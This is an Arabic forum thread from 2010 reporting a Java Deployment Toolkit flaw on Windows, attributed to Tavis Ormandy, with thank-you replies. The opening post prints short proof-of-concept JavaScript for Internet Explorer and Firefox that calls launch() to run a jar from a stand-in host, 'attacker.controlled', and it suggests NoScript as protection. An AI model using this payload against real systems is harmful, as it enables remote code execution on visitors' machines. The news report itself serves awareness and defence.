منتديات جنيفا
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.


 
الرئيسيةأحدث الصورالمنشوراتالتسجيلدخول
دخول
اسم العضو:
كلمة السر:
ادخلني بشكل آلي عند زيارتي مرة اخرى: 
:: لقد نسيت كلمة السر
المواضيع الأخيرة
» اكسبانشن اصوات تركيه وعربية ياماها new
ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Emptyالأربعاء أبريل 24, 2024 6:03 pm من طرف AIMNABO

» اعلان وتحذير هامين بخصوص ال vega ex3
ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Emptyالأربعاء أبريل 24, 2024 10:49 am من طرف abo yhya music

» yamaha 2024
ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Emptyالثلاثاء أبريل 23, 2024 1:11 am من طرف محمد الجالودي

» برنامج جديد korg M3
ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Emptyالجمعة مارس 22, 2024 3:20 am من طرف alaakomber

» كل اغانى الميدى التى قمت بعزفها وتوزيعها
ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Emptyالثلاثاء يناير 09, 2024 12:08 pm من طرف mahrezserdouk.30@gmail.co

المتواجدون الآن ؟
ككل هناك 50 عُضو متصل حالياً :: 0 عضو مُسجل, 0 عُضو مُختفي و 50 زائر :: 1 روبوت الفهرسة في محركات البحث

لا أحد

أكبر عدد للأعضاء المتواجدين في هذا المنتدى في نفس الوقت كان 1190 بتاريخ الثلاثاء يناير 24, 2012 5:25 am
احصائيات
هذا المنتدى يتوفر على 14559 عُضو.
آخر عُضو مُسجل هو Dodyyy فمرحباً به.

أعضاؤنا قدموا 325756 مساهمة في هذا المنتدى في 48044 موضوع
سحابة الكلمات الدلالية
الجالودي سودانية ميدي 3000 اغانى اشوري ايقاع korg pa600 سودانيه سوداني خليجي اغاني عراقي yamaha جينوس ياماها كلثوم برنامج اصوات عبدالوهاب midi pa800 ايقاعات اغنية 2000

 

 ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز

اذهب الى الأسفل 
4 مشترك
كاتب الموضوعرسالة
غريب
عضو
عضو
غريب


ذكر
رقم العضوية : 1374
تاريخ التسجيل : 20/11/2009
عدد الرسائل : 4473
العمر : 35
التِنِّين
الموقع : الاردن
العمل/الترفيه : معلم
المزاج : راااااااااااايق
*** : ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Lsv69280

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز U1270837


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Z6O37126


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز FQA56025

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Designer


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Dch69431

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Tvi59933


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 65
نقاط : 6109

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Empty
مُساهمةموضوع: ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز   ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Emptyالأربعاء أبريل 14, 2010 1:44 am

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز



اكتشف أحد مهندسي Google ثغرة خطيرة في
JAVA موجودة في جميع الاصدارات التي تم اطلاقها بعد Java 6 Update 10.
بحسب مكتشف الثغرة Tavis Ormandy والذي قام بنشر تفاصيلها بشكل علني
مستخدمي ويندوز بجميع اصداراته معرضين للاختراق عن طريق المتصفّح بغض
النظر عن نوعه طالما جافا منصّبة بالجهاز.



ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Java

تعتبر هذه الثغرة شديدة الخطورة لأنها تعرض جميع اصدارات نظام ويندوز
للاختراق عن طريق المتصفّح بكل سهولة وذلك عن طريق توجيه المستخدم لرابط
يحتوي على كود يستغل خطأ في Java Deployment Toolkit التي تم اضافتها الى
JAVA 6 Update 10 مما يسمح له بتمرير ملف .jar الى Java Web Start (وهي
تقنيّة تسمح للمطورين بتشغيل برامجهم المبرمجة بلغة جافا من الانترنت عن
طريق بروتوكول JNLP) وتشغيله على جهاز المستخدم.
استغلال هذه الثغرة لا يتعلّق بالمتصفّح حيث يمكن استغلالها على
Internet Explorer و Firefox أيضاً في نظام ويندوز. أما أنظمة لينوكس وماك
فعلى الأغلب أنها غير مصابة بهذه الثغرة.

كود الاستغلال في متصفّح Internet Explorer سيكون بالشكل:
var o = document.createElement("OBJECT");

o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");

أما متصفّح Mozilla Firefox فالكود هو نفسه تقريباً:
var o = document.createElement("OBJECT");

o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"

document.body.appendChild(o);

o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");

بسبب خطأ في طريقة معالجة الدالة launch للرابط الذي وضعه المهاجم, هذا
مكّنه من حقن ملف .jar سيتم تمريره الى javaws التي بدورها ستقوم بتشغيله
على النظام. مكتشف الثغرة كتب أنه أبلغ Sun قبل نشرها بشكل علني لكن رد
الشركة أتى أن هذه الثغرة ليست خطيرة بما فيه الكفاية ليقوموا بكسر دورة
التحديث الخاصة بجافا.

شخصيّاً أجد الثغرة خطيرة جداً لأن Java
تعتبر من الأمور الأساسية وموجودة في أغلب الأنظمة والسبب الآخر هو طبيعة
هذه الثغرة والثبات الكبير الذي عرفت به جافا! مع اضافة تقنيات جديدة من
الطبيعي أن تكتشف ثغرات جديدة ومن مدة بسيطة شركة Oracle أطلقت تحديث
لجافا لاصلاح 27 مشاكل أمنية فيها. كما أن هذه الثغرة لا تستغل خطأ في
الذاكرة مثلاً أو تحقن شيل كود وبهذه الحالة لا يوجد مشاكل مع تقنيات
الحماية مثل ASLR أو DEP لأن الاستغلال مختلف تماماً عن باقي ثغرات
المتصفح المعروفة وملف .jar سيعمل على النظام دون أي مشاكل.

مكتشف
الثغرة وضع بعض الحلول للحماية منها يمكنكم الاطلاع عليها من الرابط
الموجود بالأسفل, شخصيّاً أرى أن الحل الأفضل (والأسهل) هو استخدام
Firefox مع اضافة NoScript وبهذه الحالة ستكون قادر على التحكم بشكل كامل
بالأمور والسكريبتات التي سيتم تشغيلها على متصفّحك وهذا كفيل لحمايتك من
أغلب ثغرات المتصفح وليس هذه الثغرة فقط.


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Unie11



انت الزائر رقم
ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Counter
على مساهمات غريب
وهـل يـعلـم زمـاني من أكون .....
فأخبروه ......
الرجوع الى أعلى الصفحة اذهب الى الأسفل
زهرة الشاطئ
عضو
عضو



انثى
تاريخ التسجيل : 03/03/2010
عدد الرسائل : 1394
*** : ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Lsv69280

نقاط : 2250

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Empty
مُساهمةموضوع: رد: ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز   ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Emptyالأربعاء أبريل 14, 2010 2:26 am

مشكور غريب على المعلومات الخطيرة


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز JWh39952
الرجوع الى أعلى الصفحة اذهب الى الأسفل
غريب
عضو
عضو
غريب


ذكر
رقم العضوية : 1374
تاريخ التسجيل : 20/11/2009
عدد الرسائل : 4473
العمر : 35
التِنِّين
الموقع : الاردن
العمل/الترفيه : معلم
المزاج : راااااااااااايق
*** : ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Lsv69280

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز U1270837


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Z6O37126


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز FQA56025

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Designer


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Dch69431

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Tvi59933


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 65
نقاط : 6109

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Empty
مُساهمةموضوع: رد: ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز   ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Emptyالأربعاء أبريل 14, 2010 4:14 am

شكراً على المرور

ماننحرم



ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Unie11



انت الزائر رقم
ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Counter
على مساهمات غريب
وهـل يـعلـم زمـاني من أكون .....
فأخبروه ......
الرجوع الى أعلى الصفحة اذهب الى الأسفل
last_king
عضو
عضو
last_king


ذكر
رقم العضوية : 3
تاريخ التسجيل : 30/05/2008
عدد الرسائل : 961
العمر : 56
القرد
المزاج : مشغول على الفاضي
*** : ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Lsv69280

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 360681746

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Jb13115046731

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Z6O37126


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Y4o77328


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Wkatebmmyz



نقاط : 1369

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Empty
مُساهمةموضوع: رد: ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز   ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Emptyالأحد أبريل 18, 2010 5:52 am

شكرا على المعلومة الرائعة والتي اضفت للقسم حلول ومشاكل للبرامج بشكل عام والجافا مثلما ذكرت ولكن بعد اصدار 5 اصيبت تقريبا معظم الاجهزة بهذه الثغرة ولكن الاصدار الخامس بعده على حالته وانا اضم كلامي لكلامك بأن لا يتم تحديث الاصدار خمسة الا الجهاز وذلك لعدم حدوث مشاكل والمشكلة الاولى التي ستواجه الجهاز هي فصل الانترنت ويكون مشبوك على الانترنت ولا تشك بأي شيئ واذا فتحت على شبكات الاتصال تشاهد ان الجهاز يرمش رمشة سريعة ويعود وذلك يعني ان جهازك يحتاج الا الفورمات والشكر الجزيل يا غريب علىهذا الموضوع اعتبره جديد لاخواننا بالمنتدى


الرجوع الى أعلى الصفحة اذهب الى الأسفل
وجد
المساعد الإداري
المساعد الإداري
وجد


انثى
رقم العضوية : 100
تاريخ التسجيل : 06/09/2008
عدد الرسائل : 30155
الموقع : https://genevaa.yoo7.com
*** : ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Lsv69280

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 29_08_1213461978391

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 5qxsygepx9

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 14_08_1213449340856

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Nwayf-aedb51409b


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 926903733

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 84563464


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز P4P36569


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 3pV22320


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز AwF10321



ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز BA834353


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز K4y00121


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Ddp21731


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 06_08_1213442469921
نقاط : 41430

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Empty
مُساهمةموضوع: رد: ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز   ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Emptyالأحد أبريل 18, 2010 11:08 am



الف شكر غريب على المعلومات
يعطيك الف عااااااافيه
ماننحرم
ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 532204

الرجوع الى أعلى الصفحة اذهب الى الأسفل
غريب
عضو
عضو
غريب


ذكر
رقم العضوية : 1374
تاريخ التسجيل : 20/11/2009
عدد الرسائل : 4473
العمر : 35
التِنِّين
الموقع : الاردن
العمل/الترفيه : معلم
المزاج : راااااااااااايق
*** : ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Lsv69280

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز U1270837


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Z6O37126


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز FQA56025

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Designer


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Dch69431

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Tvi59933


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز 65
نقاط : 6109

ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Empty
مُساهمةموضوع: رد: ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز   ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Emptyالإثنين أبريل 19, 2010 6:58 pm

مشكوووووووووووووووورين على المرور

دمتم بحفظ الرحمن ورعايته


ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Unie11



انت الزائر رقم
ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز Counter
على مساهمات غريب
وهـل يـعلـم زمـاني من أكون .....
فأخبروه ......
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
ثغرة خطيرة في JAVA تهدد مستخدمي ويندوز
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» سكايب تسد ثغرة أمنية في إصدارها "الأندرويدي" وتضيف ميزة جديدة
» لتحويل ويندوز 7 الى ويندوز 8 المنتظر صدوره فى 2012 من حيث تحويل الثيم وصورة الافتتاحي
» حصـــــريا حول نظامك من ويندوز 7 الى ويندوز 8 وتمتع بالشكل الرائع لجهازك Windows 8 Transformation Kit 1.0 بحجم 7 ميجا
» أفضل 10 برامج لتسريع أداء ويندوز 7 [ويندوز]
» ثغرة فى المنتدى تحولك من عضو الى مشرف

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات جنيفا :: جنيفا وعالم التقنيات :: عالم التكنولوجيا والبرامج-
انتقل الى: